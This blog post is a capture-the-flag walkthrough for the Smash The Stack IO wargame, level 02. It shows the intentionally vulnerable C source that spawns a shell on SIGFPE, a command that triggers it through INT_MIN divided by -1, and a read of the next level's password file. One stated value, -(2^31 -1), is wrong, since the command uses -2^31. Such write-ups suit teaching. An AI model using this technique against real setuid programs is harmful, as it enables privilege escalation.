Category Archives: I/O

Smash The Stack – Exploit i/o – Level 02

Logging in with the password from Level 01

~$ cd /levels

you will find 2 problems that you might solve either of them

level02
level02.c
level02_alt 
level02_alt.c 

open the sourcefile

/levels$ cat level02.c

you will find the following code

 
void catcher(int a){
        setresuid(geteuid(),geteuid(),geteuid());
        printf("WIN!\n");
        system("/bin/sh");
        exit(0);
}
 
int main(int argc, char **argv){
        puts("source code is available in level02.c\n");
 
        if (argc != 3 || !atoi(argv[2]))
                return 1;
        signal(SIGFPE, catcher);
        return atoi(argv[1]) / atoi(argv[2]);
}

the program catches a SIGFPE which is an arithmetic error like division by zero or subscript out of bound

you can’t divide by zero as the code checks for argv[2] for a non-zero value

but by a little math you can know that you can generate the same error by dividing -(2^31 -1) over -1

then the rest is easy

/levels$ ./level02 -2147483648 -1

then grab the password

/levels$ cat /home/level3/.pass

it took me a time of searching to know what cases exactly causes the SIGFPE.